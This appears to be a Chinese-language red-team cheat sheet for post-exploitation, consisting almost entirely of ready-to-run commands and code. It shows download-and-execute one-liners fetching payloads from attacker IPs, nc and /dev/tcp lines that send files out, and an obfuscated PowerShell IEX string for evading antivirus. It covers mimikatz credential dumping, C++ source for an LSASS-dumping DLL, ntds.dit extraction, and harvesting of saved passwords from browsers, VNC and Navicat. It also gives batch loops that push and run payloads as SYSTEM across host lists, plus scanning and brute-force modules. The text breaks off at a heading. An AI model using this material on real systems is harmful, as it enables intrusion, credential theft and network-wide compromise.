注意:內核5.2以下版本可能無效>powershell (new-object System.Net.WebClient).DownloadFile('http://192.168.1.1/Client.exe','C:\1.exe'); start-process 'c:\1.exe'>powershell>(New-Object System.Net.WebClient).DownloadFile('http://192.168.0.108/1.exe',"$env:APPDATA\csrsv.exe");Start-Process("$env:APPDATA\csrsv.exe")
2
PS>Copy-Item '\\sub2k8.zone.com\c$\windows\1.txt' -Destination '\\dc.zone.com\c$\1.txt'
3
>powershell ($dpl=$env:temp+'f.exe');(New-Object System.Net.WebClient).DownloadFile('http://192.168.0.108/ok.txt',$dpl);
4
高版本PS>iwr -Uri http://192.168.0.106:1222/111.txt -outfile 123.txt –UseBasicParsing
5
C:\Users\Administrator\AppData\Roaming\Microsoft\Windows\Templates>Import-Module BitsTransfer>$path = [environment]::getfolderpath("temp")>Start-BitsTransfer -Source "http://192.168.0.108/ok.txt" -Destination "$path\ok.txt">Invoke-Item "$path\ok.txt"
Certutil
>certutil.exe -urlcache -split -f http://192.168.1.192/Client.exe>certutil.exe -urlcache -split -f http://192.168.1.192/Client.exe delete對文件進行編碼下載后解碼執行>base64 payload.exe > /var/www/html/1.txt # 在C&C上生成經base64編碼的exe>certutril -urlcache -split -f http://192.168.0.107/1.txt & certurl -decode 1.txt ms.exe & ms.exe
Python
#python -c 'import urllib;urllib.urlretrieve("http://192.168.1.192/Client.exe","/path/to/save/1.exe")'
Perl
#!/usr/bin/perluse LWP::Simple;getstore("http://192.168.1.192/Client.exe", "1.exe");
PHP
#!/usr/bin/php<?php $data = @file("http://192.168.1.192/Client.exe");$lf = "1.exe"; $fh = fopen($lf, 'w'); fwrite($fh, $data[0]); fclose($fh);?>
Curl
#curl -o 1.exe http://192.168.1.192/Client.exe
wget
#wget http://192.168.1.192/Client.exe#wget –b后臺下載#wget –c 中斷恢復
nc
>nc –lvnp 333 >1.txt目標機>nc –vn 192.168.1.2 333 <test.txt –q 1&>cat 1.txt >/dev/tcp/1.1.1.1/333
SCP
Linux中傳輸文件>scp -P 22 file.txt user@1.1.1.1:/tmp
Hash&密碼
破解網址
https://www.objectif-securite.ch/en/ophcrackhttp://cracker.offensive-security.com/index.php
GoogleColab破解hash
之前在freebuf上看到過相關文章,最近在github上也看到了這個腳本,所以拿起來試試,速度可觀https://www.freebuf.com/geek/195453.htmlhttps://gist.github.com/chvancooten/59acfbf1d8ee7a865108fca2e9d04c4a打開https://drive.google.com/drive新建一個文件夾,右鍵,更多選擇google Colab
如果沒有,點關聯更多應用,搜索這個名字,安裝一下即可
安裝hashcat,下載字典
運行類型選擇GPU加速
這里測試個簡單密碼
12億條密碼大概20多分鐘https://download.weakpass.com/wordlists/1851/hashesorg2019.gz以上是字典
密碼策略
默認情況,主機賬號的口令每30天變更一次>HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\services\Netlogon\Parameters,鍵值為DisablePasswordChange,設置為1,即表示禁止修改賬號口令>組策略(gpedit.msc)中修改默認的30天,修改位置為"Computer Configuration\Windows Settings\Security Settings\Local Policies\Security Options\Domain member: Maximum machine account password age"設置為0時,表示無限長>禁止修改主機賬號口令,用來支持VDI (virtual desktops)等類型的使用,具體位置為"Computer Configuration\Windows Settings\Security Settings\Local Policies\Security Options\Domain member: Disable machine account password changes"Debug Privilege本地安全策略>本地策略>用戶權限分配>調試程序
開啟Wdigest
Cmd
>reg add HKLM\SYSTEM\CurrentControlSet\Control\SecurityProviders\WDigest /v UseLogonCredential /t REG_DWORD /d 1 /f
powershell
>Set-ItemProperty -Path HKLM:\SYSTEM\CurrentControlSet\Control\SecurityProviders\WDigest -Name UseLogonCredential -Type DWORD -Value 1
meterpreter
>reg setval -k HKLM\\SYSTEM\\CurrentControlSet\\Control\\SecurityProviders\\WDigest -v UseLogonCredential -t REG_DWORD -d 1
Getpass
>getpassword.exe>1.txt
QuarksPwDump
>QuarksPwDump.exe -dump-hash-local
MSF
Meterpreter > run hashdump&Meterpreter > mimikatz_command -f samdump::hashes&Meterpreter > load mimikatzMeterpreter > wdigest&Meterpreter > load mimikatzMeterpreter > msvMeterpreter > kerberos&Meterpreter > load kiwiMeterpreter > creds_all&Meterpreter > migrate PIDMeterpreter > load mimikatzMeterpreter > mimikatz_command -f sekurlsa::searchPasswords&Meterpreter > run windows/gather/smart_hashdump
Empire
>usemodule credentials/mimikatz/dcsync_hashdump
Invoke-Dcsync
>powershell -nop -ep bypass "IEX (New-Object Net.WebClient).DownloadString('http://192.168.0.107/ps/Invoke-DCSync.ps1');invoke-dcsync
Mimikatz
調用mimikatz遠程抓取
抓明文>powershell IEX (New-Object Net.WebClient).DownloadString('http://192.168.0.108/nishang/Gather/Invoke-Mimikatz.ps1'); Invoke-Mimikatz抓hash>powershell IEX (New-Object Net.WebClient).DownloadString('http://192.168.0.100/nishang/Gather/Get-PassHashes.ps1');Get-PassHashes>powershell -w hidden -ep bypass "IEX (New-Object Net.WebClient).DownloadString('http://192.168.0.107/ps/powersploit/Exfiltration/Invoke-Mimikatz.ps1'); Invoke-Mimikatz" >C:\Users\Administrator.DC\Desktop\1123.txt
橫向批量抓hash
Schtasks
把IP列表放入ip.txt文件中,通過一個賬戶密碼批量net use與列表里的IP建立連接,如果建立連接沒出錯的話,復制getpass到目錄temp目錄,使用賬戶密碼遠程創建計劃任務名字為windowsupdate,指定每日00:00以system權限執行getpass文件,創建完計劃任務后,/tn是立刻執行此計劃任務,執行完后刪除此計劃任務,ping -n 10>nul是程序停留,相當于延時10秒,之后復制文件到本地,接著刪除getpass文件,刪除創建的連接�。>for /f %i in (ip.txt) do net use \\%i\admin$ /user:"administrator" "password" & if %errorlevel% equ 0 ( copy getpass.exe \\%i\admin$\temp\ /Y ) & schtasks /create /s "%i" /u "administrator" /p "password" /RL HIGHEST /F /tn "windowsupdate" /tr "c:\windows\temp\getpass.exe" /sc DAILY /mo 1 /ST 00:00 /RU SYSTEM & schtasks /run /tn windowsupdate /s "%i" /U "administrator" /P "password" & schtasks /delete /F /tn windowsupdate /s "%i" /U " administrator" /P "password" & @ping 127.0.0.1 -n 10 >nul & move \\%i\admin$\temp\dumps.logs C:\Users\Public\%i.logs & del \\%i\admin$\debug\getpass.exe /F & net use \\%i\admin$ /del
Wmic
>for /f %i in (ip.txt) do net use \\%i\admin$ /user:"administrator" "password" & if %errorlevel% equ 0 ( copy getpass.exe \\%i\admin$\temp\ /Y ) & wmic /NODE:"%i" /user:"administrator" /password:"password" PROCESS call create "c:\windows\temp\getpass.exe" & @ping 127.0.0.1 -n 10 >nul & move \\%i\admin$\temp\dumps.logs C:\Users\Public\%i.logs & del \\%i\admin$\temp\getpass.exe /F & net use \\%i\admin$ /del
直接使用
>mimikatz.exe ""privilege::debug"" ""sekurlsa::logonpasswords full"" exit >> log.txt>privilege::debug>misc::memssp鎖屏>rundll32.exe user32.dll,LockWorkStation記錄的結果在c:\windows\system32\mimilsa.log>mimikatz log "privilege::debug" "lsadump::lsa /patch">mimikatz !privilege::debug>mimikatz !token::elevate>mimikatz !lsadump::sam
Powershell Bypass
>powershell -c " ('IEX '+'(Ne'+'w-O'+'bject Ne'+'t.W'+'ebClien'+'t).Do'+'wnloadS'+'trin'+'g'+'('+'1vchttp://'+'192.168.0'+'.101/'+'Inv'+'oke-Mimik'+'a'+'tz.'+'ps11v'+'c)'+';'+'I'+'nvoke-Mimika'+'tz').replace('1vc',[STRing][char]39)|IeX"
.net 2.0
katz.cs放置C:\Windows\Microsoft.NET\Framework\v2.0.50727Powershell執行>$key = 'BwIAAAAkAABSU0EyAAQAAAEAAQBhXtvkSeH85E31z64cAX+X2PWGc6DHP9VaoD13CljtYau9SesUzKVLJdHphY5ppg5clHIGaL7nZbp6qukLH0lLEq/vW979GWzVAgSZaGVCFpuk6p1y69cSr3STlzljJrY76JIjeS4+RhbdWHp99y8QhwRllOC0qu/WxZaffHS2te/PKzIiTuFfcP46qxQoLR8s3QZhAJBnn9TGJkbix8MTgEt7hD1DC2hXv7dKaC531ZWqGXB54OnuvFbD5P2t+vyvZuHNmAy3pX0BDXqwEfoZZ+hiIk1YUDSNOE79zwnpVP1+BN0PK5QCPCS+6zujfRlQpJ+nfHLLicweJ9uT7OG3g/P+JpXGN0/+Hitolufo7Ucjh+WvZAU//dzrGny5stQtTmLxdhZbOsNDJpsqnzwEUfL5+o8OhujBHDm/ZQ0361mVsSVWrmgDPKHGGRx+7FbdgpBEq3m15/4zzg343V9NBwt1+qZU+TSVPU0wRvkWiZRerjmDdehJIboWsx4V8aiWx8FPPngEmNz89tBAQ8zbIrJFfmtYnj1fFmkNu3lglOefcacyYEHPX/tqcBuBIg/cpcDHps/6SGCCciX3tufnEeDMAQjmLku8X4zHcgJx6FpVK7qeEuvyV0OGKvNor9b/WKQHIHjkzG+z6nWHMoMYV5VMTZ0jLM5aZQ6ypwmFZaNmtL6KDzKv8L1YN2TkKjXEoWulXNliBpelsSJyuICplrCTPGGSxPGihT3rpZ9tbLZUefrFnLNiHfVjNi53Yg4='>$Content = [System.Convert]::FromBase64String($key)>Set-Content key.snk -Value $Content –Encoding ByteCmd執行>C:\Windows\Microsoft.NET\Framework\v2.0.50727\csc.exe /r:System.EnterpriseServices.dll /out:katz.exe /keyfile:key.snk /unsafe katz.cs>C:\Windows\Microsoft.NET\Framework\v2.0.50727\regsvcs.exe katz.exe
.net 4.0 Msbuild
>C:\Windows\Microsoft.NET\Framework64\v4.0.30319\msbuild mimi.xml
JScript
>wmic os get /format:"mimikatz.xsl"
>wmic os get /format:"http://192.168.0.107/ps/mimi.xsl"
Procdump64+mimikatz
>procdump64.exe -accepteula -64 -ma lsass.exe lsass.dmp>procdump.exe -accepteula -ma lsass.exe lsass.dmp>mimikatz.exe "sekurlsa::minidump lsass.dmp" "sekurlsa::logonPasswords full" exit>powershell -nop -exec bypass -c "IEX (New-Object Net.WebClient).DownloadString('https://raw.githubusercontent.com/TheKingOfDuck/hashdump/master/procdump/procdump.ps1');Invoke-Procdump64 -Args '-accepteula -ma lsass.exe lsass.dmp'"
Dumpert
https://github.com/outflanknl/Dumpert有三種,分別是dll,可執行文件和cs的Aggressor插件,這里測試下dll和exeDLL的執行方式是rundll32.exe C:\Outflank-Dumpert.dll,Dump
文件保存在c:\windows\temp\dumpert.dmp用mimikatz>sekurlsa::mimidump c:\windows\temp\dumpert.dmp>sekurlsa::logonpasswords
可執行文件就直接執行就可以了
Cisco Jabber轉儲lsass
cd c:\program files (x86)\cisco systems\cisco jabber\x64\processdump.exe (ps lsass).id c:\temp\lsass.dmp
繞過卡巴斯基
https://gist.github.com/xpn/c7f6d15bf15750eae3ec349e7ec2380e
將三個文件下載到本地,使用visual studio進行編譯,需要修改了幾個地方�����。(1)添加如下代碼#pragma comment(lib, "Rpcrt4.lib") (引入Rpcrt4.lib庫文件)(2)將.c文件后綴改成.cpp (使用了c++代碼,需要更改后綴)(3) 編譯時選擇x64編譯得到exe文件Visual studio創建c++空項目配置類型選dll字符集選Unicode,調試器選64位Dll保存在C:\\windows\\temp\\1.bin
#include <cstdio>#include <windows.h>#include <DbgHelp.h>#include <iostream>#include <string> #include <map> #include <TlHelp32.h> #pragma comment(lib,"Dbghelp.lib")using namespace std; int FindPID(){ PROCESSENTRY32 pe32; pe32.dwSize = sizeof(pe32); HANDLE hProcessSnap = CreateToolhelp32Snapshot(TH32CS_SNAPPROCESS, 0); if (hProcessSnap == INVALID_HANDLE_VALUE) { cout << "CreateToolhelp32Snapshot Error!" << endl;; return false; } BOOL bResult = Process32First(hProcessSnap, &pe32); while (bResult) { if (_wcsicmp(pe32.szExeFile, L"lsass.exe") == 0) { return pe32.th32ProcessID; } bResult = Process32Next(hProcessSnap, &pe32); } CloseHandle(hProcessSnap); return -1;} typedef HRESULT(WINAPI* _MiniDumpW)( DWORD arg1, DWORD arg2, PWCHAR cmdline); typedef NTSTATUS(WINAPI* _RtlAdjustPrivilege)( ULONG Privilege, BOOL Enable, BOOL CurrentThread, PULONG Enabled); int dump() { HRESULT hr; _MiniDumpW MiniDumpW; _RtlAdjustPrivilege RtlAdjustPrivilege; ULONG t; MiniDumpW = (_MiniDumpW)GetProcAddress( LoadLibrary(L"comsvcs.dll"), "MiniDumpW"); RtlAdjustPrivilege = (_RtlAdjustPrivilege)GetProcAddress( GetModuleHandle(L"ntdll"), "RtlAdjustPrivilege"); if (MiniDumpW == NULL) { return 0; } // try enable debug privilege RtlAdjustPrivilege(20, TRUE, FALSE, &t); wchar_t ws[100]; swprintf(ws, 100, L"%hd%hs", FindPID(), " C:\\windows\\temp\\1.bin full"); MiniDumpW(0, 0, ws); return 0; }BOOL APIENTRY DllMain(HMODULE hModule, DWORD ul_reason_for_call, LPVOID lpReserved) { switch (ul_reason_for_call) { case DLL_PROCESS_ATTACH: dump(); break; case DLL_THREAD_ATTACH: case DLL_THREAD_DETACH: case DLL_PROCESS_DETACH: break; } return TRUE;}
>xxx.exe c:\xx\xx\xx.dll使用絕對路徑
遠程LSASS進程轉儲-Physmem2profit
https://github.com/FSecureLABS/physmem2profitmimikatz被多數安全人員用來獲取憑據,但現在的AV/EDR很輕易的識別并查殺,這里不在服務器端使用mimikatz,遠程對lsass進程進行轉儲�。服務器端直接使用visual studio構建physmem2profit-public\server\
客戶端>git clone --recurse-submodules https://github.com/FSecureLABS/physmem2profit.git客戶端這里先安裝>bash physmem2profit/client/install.sh
需要將此文件https://github.com/Velocidex/c-aff4/raw/master/tools/pmem/resources/winpmem/att_winpmem_64.sys傳到目標服務器,我這里存放在c:\windows\temp\中服務器端執行>Physmem2profit.exe --ip 192.168.0.98 --port 8888 –verbose這里的IP是服務器端IP
攻擊端安裝所需模塊
攻擊端執行>source physmem2profit/client/.env/bin/activate>cd physmem2profit/client>python3 physmem2profit --mode all --host 192.168.0.98 --port 8888 --drive winpmem --install 'c:\windows\temp\att_winpmem_64.sys' --label test
服務器端可以看到
把生成的dmp文件轉移到win系統上使用mimikatz即可獲得hash,當然也可以在linux上使用pypykatz�����。
再來一條轉儲lsass進程的命令要以system權限執行>rundll32.exe C:\Windows\System32\comsvcs.dll MiniDump <lsass pid> lsass.dmp full
SqlDumper+mimikatz
位置C:\Program Files\Microsoft SQL Server\number\Shared>tasklist /svc | findstr lsass.exe 查看lsass.exe 的PID號>Sqldumper.exe ProcessID PID 0x01100 導出mdmp文件>mimikatz.exe "sekurlsa::minidump SQLDmpr0001.mdmp" "sekurlsa::logonPasswords full" exit
Mimipenguin
抓取linux下hash,root權限https://github.com/huntergregal/mimipenguin
緩存hash提取
注冊表
>reg save hklm\sam c:\sam.hive ® save hklm\system c:\system.hive ® save hklm\security c:\security.hive>mimikatz.exe "lsadump::sam /system:sys.hive /sam:sam.hive" exit
Ninjacopy
#http://192.168.0.101/powersploit/Exfiltration/Invoke-NinjaCopy.ps1>powershell -exec bypass>Import-Module .\invoke-ninjacopy.ps1>Invoke-NinjaCopy -Path C:\Windows\System32\config\SAM -LocalDestination .\sam.hive>Invoke-NinjaCopy –Path C:\Windows\System32\config\SYSTEM -LocalDestination .\system.hive>Invoke-NinjaCopy -Path "c:\windows\ntds\ntds.dit" -LocalDestination "C:\Windows\Temp\1.dit">Invoke-NinjaCopy -Path "c:\windows\ntds\ntds.dit" -ComputerName "dc.zone.com" -LocalDestination "C:\Windows\Temp\1.dit"
Quarks-pwdump
>quarks-pwdump.exe –dump-hash-domain
域hash提取
Ntdsutil
>ntdsutil>snapshot>activate instance ntds>create>mount {guid}>copy 裝載點\windows\NTDS\ntds.dit d:\ntds_save.dit>unmount {guid}>delete {guid}>quit&創建> ntdsutil snapshot “activate instance ntds” create quit quit掛載> ntdsutil snapshot “mount {guid}” quit quit復制>copy c:\$SNAP_XXX_VOLUMEC$\windows\NTDS\ntds.dit d:\ntds_save.dit卸載并刪除> ntdsutil snapshot “unmounts {guid}” “delete {guid}” quit quit刪除后檢測> ntdsutil snapshot “List All” quit quit提取hash> QuarksPwDump -dump-hash-domain -ntds-file d:\ntds_save.dit
Vssadmin
創建C盤卷影拷貝>vssadmin create shadow /for=c:復制ntds.dit>copy {Shadow Copy Volume Name}\windows\NTDS\ntds.dit c:\ntds.dit刪除拷貝>vssadmin delete shadows /for=c: /quiet
Impacket
Impacket中的secretsdump.py#impacket-secretsdump –system SYSTEM –ntds.dit LOCAL或#impacket-secretsdump –hashs xxx:xxx –just-dc xxx.com/admin\@192.168.1.1
NTDSDumpex
>Invoke-NinjaCopy -Path "c:\windows\ntds\ntds.dit" -LocalDestination "C:\Windows\Temp\1.dit">reg save HKLM\SYSTEM C:\Windows\Temp\SYSTEM.hivehttps://github.com/zcgonvh/NTDSDumpEx>NTDSDumpEx.exe -d ntds.dit -s SYSTEM.hive
WMI調用Vssadmin
>wmic /node:dc /user:xxxx\admin /password:passwd process call create "cmd /c vssadmin create shadow /for=C: 2>&1">wmic /node:dc /user:P xxxx\admin /password: passwd process call create "cmd /c copy \\?\GLOBALROOT\Device\HarddiskVolumeShadowCopy1\Windows\NTDS\NTDS.dit C:\temp\ntds.dit 2>&1">wmic /node:dc /user: xxxx\admin /password: passwd process call create "cmd /c copy \\?\GLOBALROOT\Device\HarddiskVolumeShadowCopy1\Windows\System32\config\SYSTEM\ C:\temp\SYSTEM.hive 2>&1">copy \\10.0.0.1\c$\temp\ntds.dit C:\tempPS C:\Users\test.PENTESTLAB> copy \\10.0.0.1\c$\temp\SYSTEM.hive C:\temp
PowerSploit
PS >Import-Module .\VolumeShadowCopyTools.ps1PS >New-VolumeShadowCopy -Volume C:\PS >Get-VolumeShadowCopy
Nishang
PS >Import-Module .\Copy-VSS.ps1PS >Copy-VSSPS >Copy-VSS -DestinationDir C:\ShadowCopy\或MSF中Meterpreter>load powershellMeterpreter>powershell_import /root/Copy-VSS.ps1Meterpreter>powershell_execute Copy-VSS
Mimikatz
#lsadump::dcsync /domain:xxx.com /all /csv或#privilege::debug#lsadump::lsa /inject
MSF
#use auxiliary/admin/smb/psexec_ntdsgrab#set rhost smbdomain smbuser smbpass#exploitNtds.dit文件存在/root/.msf4/loot后滲透模塊#use windows/gather/credentials/domain_hashdump#set session 1
laZagne
windows
https://github.com/AlessandroZ/LaZagne>laZagne.exe all -oN獲取所有密碼輸出到文件PowershellPS>[Windows.Security.Credentials.PasswordVault,Windows.Security.Credentials,ContentType=WindowsRuntime]PS>$vault = New-Object Windows.Security.Credentials.PasswordVaultPS>$vault.RetrieveAll() | % { $_.RetrievePassword();$_ }
Linux
>python3 laZagne.py all
敏感信息
Seatbelt
使用Visual studio編譯>Seatbelt.exe ALL獲取所有信息
VNC密碼
>reg query HKEY_LOCAL_MACHINE\SOFTWARE\TightVNC\Server /v passwordhttp://www.cqure.net/wp/tools/password-recovery/vncpwdump/解密>vncpwdump.exe -k hash
Navicat信息
>reg query HKEY_CURRENT_USER\SOFTWARE\PremiumSoft\Navicat\Servers /s /v host>reg query HKEY_CURRENT_USER\SOFTWARE\PremiumSoft\Navicat\Servers /s /v UserName>reg query HKEY_CURRENT_USER\SOFTWARE\PremiumSoft\Navicat\Servers /s /v pwd離線破解https://github.com/HyperSine/how-does-navicat-encrypt-password
Chrome保存的密碼
>mimikatz dpapi::chrome /in:"%localappdata%\Google\Chrome\User Data\Default\Login Data" /unprotect
Foxmail
X:\Foxmail\storage\xxx\Accounts\Account.rec0使用Foxmail Password Decryptor解密https://securityxploded.com/foxmail-password-decryptor.php
firefox保存的密碼
https://www.nirsoft.net/password_recovery_tools.html>webbrowserpassview.exe /LoadPasswordsFirefox 1 /shtml "c:\1.html"或>dir %appdata%\Mozilla\Firefox\Profiles\>dir %appdata%\Mozilla\Firefox\Profiles\yn80ouvt.default需先結束firefox.exe進程壓縮>7z.exe -r -padmin123 a c:\users\public\firefox.7z C:\Users\Administrator\AppData\Roaming\Mozilla\*.*https://github.com/unode/firefox_decrypthttps://securityxploded.com/firefox-master-password-cracker.php
SecureCRT
C:\Documents and Settings\Administrator\Application Data\VanDyke下的config文件夾C:\program files\Vandyke software\securecrt\https://github.com/uknowsec/SharpDecryptPwd
橫向
探測存活主機
For+Ping命令查詢存活主機
>for /L %I in (1,1,254) DO @ping -w 1 -n 1 192.168.0.%I |findstr "TTL="
For+Ping命令查詢域名對應IP>for /f "delims=" %i in (D:/domains.txt) do @ping -w 1 -n 1 %i | findstr /c:"[192." >> c:/windows/temp/ds.txt
內外網資產對應
1.將收集到的子域名保存,使用ping命令在內網循環for /f "delims=" %i in (host.txt) do @ping -w 1 -n 1 %i | findstr /c:"[10." /c:"[192." /c:"[172." >> C:/users/public/out.txt2.找到dns服務器ip,ipconfig或掃描開啟53端口的機器https://github.com/Q2h1Cg/dnsbrutednsbrute.exe -domain a.com -dict ziyuming.txt -rate 1000 -retry 1 -server 192.168.1.1:533.掃描內網ip開啟web服務的title
NbtScan
Windows>nbtscan.exe -m 192.168.1.0/24Linux#nbtscan -r 192.168.0.0/24
NMAP
#nmap -Pn -open -A -n -v -iL filename.txt-Pn:跳過主機發現-n:不做DNS解析-open:只顯示開啟的端口-A:掃描過程中,輸入回車,可以查看掃描進度-v:顯示詳細信息-F:快速掃描100個常見端口-p:選擇要掃描的端口 例: -p1-65535 (全端口掃描,中間沒有空格)-iL:為程序指定一個要掃描的IP列表-sV:探測開放端口的服務和版本信息-T可以選擇掃描等級,默認T3,但想快點話,可以輸入 -T4存活主機>nmap -sP -PI 192.168.0.0/24>nmap -sn -PE -T4 192.168.0.0/24>nmap -sn -PR 192.168.0.0/24
代理nmap掃描
meterpreter > backgroundmsf > use auxiliary/server/socks4a再配置proxychains.conf#proxychains nmap -sT -sV -Pn -n -p22,80,135,139,445 --script=smb-vuln-ms08-067.nse 內網IP
NetDiscover
#netdiscover -r 192.168.0.0/24 -i wlan0
rp-scan
kali>arp-scan --interface=wlan0 -localnetWindows>arp-scan.exe -t 192.168.0.0/24
MSF
#use auxiliary/scanner/discovery/arp_sweep
#use auxiliary/scanner/discovery/udp_sweep
#use auxiliary/scanner/netbios/nbnamemeterpreter>run post/windows/gather/arp_scanner RHOSTS=192.168.1.1/24meterpreter>run post/multi/gather/ping_sweep RHOSTS=192.168.1.1/24
探測服務&端口
常見端口
| 服務 | 端口 |
|---|
| Mssql | 1433 |
| SMB | 445 |
| WMI | 135 |
| winrm | 5985 |
| rdp | 3389 |
| ssh | 22 |
| oracle | 1521 |
| mysql | 3306 |
| redis | 6379 |
| postgresql | 5432 |
| ldap | 389 |
| smtp | 25 |
| pop3 | 110 |
| imap | 143 |
| exchange | 443 |
| vnc | 5900 |
| ftp | 21 |
| rsync | 873 |
| mongodb | 27017 |
| telnet | 23 |
| svn | 3690 |
| java rmi | 1099 |
| couchdb | 5984 |
| pcanywhere | 5632 |
| web | 80-90,8000-10000,7001,9200,9300 |
Powershell
Powersploit
>powershell.exe -nop -exec bypass -c "IEX(New-Object net.webclient).DownloadString('http://192.168.0.107/ps/powersploit/Recon/Invoke-Portscan.ps1'); Invoke-Portscan -Hosts 192.168.0.0/24 –T 4 -Ports '1-65535' -oA C:\TEMP.txt"
Nishang
>powershell.exe -nop -exec bypass -c "IEX(New-Object net.webclient).DownloadString('http://192.168.0.107/ps/nishang/Scan/Invoke-PortScan.ps1'); Invoke-Portscan -StartAddress 192.168.0.1 -EndAddress 192.168.0.254 -ResolveHost -ScanPort"
去掉scanport就是探測存活
SMB
https://github.com/ShawnDEvans/smbmap
MSF
#use auxiliary/scanner/smb/smb_version查詢開啟139,445端口主機#use auxiliary/scanner/smb/smb_login 爆破
NMAP
#nmap -sU -sS --script smb-enum-shares.nse -p 445 192.168. 1.119
CMD
>for /l %a in (1,1,254) do start /min /low telnet 192.168.1.%a 445
Linux Samba服務
端口一般139,弱口令連接>smbclient -L 192.168.0.110>smbclient '\\192.168.0.110\IPC$'#use exploit/linux/samba/is_known_pipenamea
MSF
端口
#use auxiliary/scanner/portscan/tcp#use auxiliary/scanner/portscan/ack
服務
#use auxiliary/scanner/ftp/ftp_version 開啟FTP的機器#use auxiliary/scanner/ftp/anonymous 允許匿名登錄的FTP#use auxiliary/scanner/ftp/ftp_login FTP爆破#use auxiliary/scanner/http/http_version 開啟HTTP服務的#use auxiliary/scanner/smb/smb_version 開啟SMB服務的#use auxiliary/scanner/smb/smb_enumshares 允許匿名登錄的SMB#use auxiliary/scanner/smb/smb_login SMB爆破#use auxiliary/scanner/ssh/ssh_version 開啟SSH的機器#use auxiliary/scanner/ssh/ssh_login SSH爆破#use auxiliary/scanner/telnet/telnet_version 開啟TELNET服務的#use auxiliary/scanner/telnet/telnet_login TELNET爆破#use auxiliary/scanner/mysql/mysql_version 開啟MYSQL服務的#use auxiliary/scanner/mysql/mysql_login MYSQL爆破#use auxiliary/scanner/mssql/mssql_ping 開啟SQLSERVER服務的#use auxiliary/scanner/mssql/mssql_login MSSQL爆破#use auxiliary/scanner/postgres/postgres_version開啟POSTGRE服務的#use auxiliary/scanner/postgres/postgres_login POSTGRESQL爆破#use auxiliary/scanner/oracle/tnslsnr_version 開啟oracle數據庫的#use auxiliary/admin/oracle/oracle_login Oracle數據庫爆破#use auxiliary/scanner/http/title 掃描HTTP標題#use auxiliary/scanner/rdp/rdp_scanner 開啟RDP服務的#use auxiliary/scanner/http/webdav_scanner#use auxiliary/scanner/http/http_put 開啟WEBDAV的#use auxiliary/scanner/smb/smb_ms17_010 存在17010漏洞的#use auxiliary/scanner/http/zabbix_login zabbix爆破#use auxiliary/scanner/http/axis_login axis爆破#use auxiliary/scanner/redis/redis_login redis爆破
Nc
>nc -znv 192.168.0.98 1-65535
>nc -v -w 1 192.168.0.110 -z 1-1000>for i in {101..102}; do nc -vv -n -w 1 192.168.0.$i 21-25 -z; done
Masscan
$sudo apt-get install clang git gcc make libpcap-dev$git clone https://github.com/robertdavidgraham/masscan$cd masscan$make>masscan -p80,3389,1-65535 192.168.0.0/24
PTScan
友好識別web服務https://github.com/phantom0301/PTscan/blob/master/PTscan.py>python PTscan.py {-f /xxx/xxx.txt or -h 192.168.1} [-p 21,80,3306] [-m 50] [-t 10] [-n(不ping)] [-b(開啟banner掃描)] [-r查找IP]80,81,82,83,84,85,86,87,88,89,90,91,901,18080,8080,8081,8082,8083,8084,8085,8086,8087,8088,8089,8090,443,8443,7001
CobaltStrike+K8 Aggressor
https://github.com/k8gege/Aggressor
存活主機
beacon>Cscan 192.168.0.0/24 OnlinePC
MS17010
beacon>Cscan 192.168.0.0/24 MS17010
操作系統信息
beacon>Cscan 192.168.0.0/24 Osscan
內網站點banner����、標題掃描
beacon>Cscan 192.168.0.0/24 WebScan
FTP爆破
上傳賬戶密碼文件user.txt��、pass.txt到beacon目錄(beacon>pwd)beacon>Cscan 192.168.0.0/24 FtpScan
WMI爆破windows賬戶密碼
上傳賬戶密碼文件user.txt����、pass.txt到beacon目錄(beacon>pwd)beacon>Cscan 192.168.0.0/24 WmiScan
思科設備掃描
beacon>Cscan 192.168.0.0/24 CiscoScan
枚舉共享
beacon> EnumShare
枚舉SQL SERVER數據庫
beacon> EnumMSSQL
執行命令&IPC&計劃任務
建立連接>net use \\192.168.1.2\ipc$ "password" /user:domain\administrator查看連接>net use列文件>dir \\192.168.1.2\c$查看系統時間>net time \\192.168.1.2上傳文件>copy 1.exe \\192.168.1.2\c$下載文件>copy \\192.168.1.2\c$\1.exe 1.exe批量IPC@echo offecho check ip addr config file…if not exist ip.txt echo ip addr config file ip.txt does not exist! & goto endecho read and analysis file…for /F "eol=#" %%i in (ip.txt) do start PsExec.exe \\%%i -accepteula -u administrator -p "123456" cmd & start cmd /c PsExec.exe \\%%i -u administrator -p "123456" cmd:endexit
AT
>net use \\192.168.1.2\ipc$ "password" /user:domain\administrator>copy 1.exe \\192.168.1.2\c$>net time \\192.168.1.2>at \\192.168.1.2 1:00AM c:\1.exe>at \\192.168.1.2 1:00AM cmd.exe /c “ipconfig >c:/1.txt”>type \\192.168.1.2\c$\1.txt查看計劃任務>at \\192.168.1.2刪除計劃任務>at \\192.168.1.2 計劃ID /delete橫向批量上線>atexec.exe ./administrator:pass@10.1.1.1 "certutil.exe -urlcache -split -f http://youip.com:80/shell.txt c:/windows/debug/SysDug.exe">atexec.exe ./administrator:pass@10.1.1.1 "c:/windows/debug/SysDug.exe">atexec.exe ./administrator:pass@10.1.1.1 "certutil.exe -urlcache -split -f c:/windows/debug/SysDug.exe delete"
Schtasks
>net use \\192.168.0.55\ipc$ "password" /user:"domain\administrator">schtasks /query /fo LIST /v 查看計劃任務上傳文件>copy ok.exe \\192.168.0.55\c$\windows\temp遠程創建定時任務>schtasks /create /s "192.168.0.55" /u "admin" /p "qqq23" /RL HIGHEST /F /tn "windowsupdate" /tr "c:\windows\temp\ok.exe" /sc DAILY /mo 1 /ST 20:28 /RU SYSTEM查詢遠程創建的任務>schtasks /query /s "192.168.0.55" /U "admin" /P "qqq23" | findstr "windowsupdate"立即執行遠程任務>schtasks /run /tn windowsupdate /s "192.168.0.55" /U "admin" /P "qqq23"刪除定時任務>schtasks /delete /tn windowsupdate /F /s "192.168.0.55" /u "admin" /p "qqq23"刪除IPC>net user name /del /y橫向批量上線>for /f %i in (ip.txt) do net use \\%i\admin$ /user:"administrator" "password" & if %errorlevel% equ 0 ( copy ok.exe \\%i\admin$\debug\ /Y ) & wmic /NODE:"%i" /user:"administrator" /password:"password" PROCESS call create "c:\windows\debug\ok.exe" & @ping 127.0.0.1 -n 8 >nul & net use \\%i\admin$ /del
WMIC
>net use \\192.168.0.55\ipc$ "password" /user:"domain\administrator">copy ok.exe \\192.168.0.55\c$\windows\temp>wmic /NODE:" 192.168.0.55" /user:"administrator" /password:"password" PROCESS call create "c:\windows\temp\ok.exe">del \\192.168.0.55\c$\windows\temp\ok.exe /F>net use \\192.168.0.55\c$ /del
快速定位域管理登過的機器
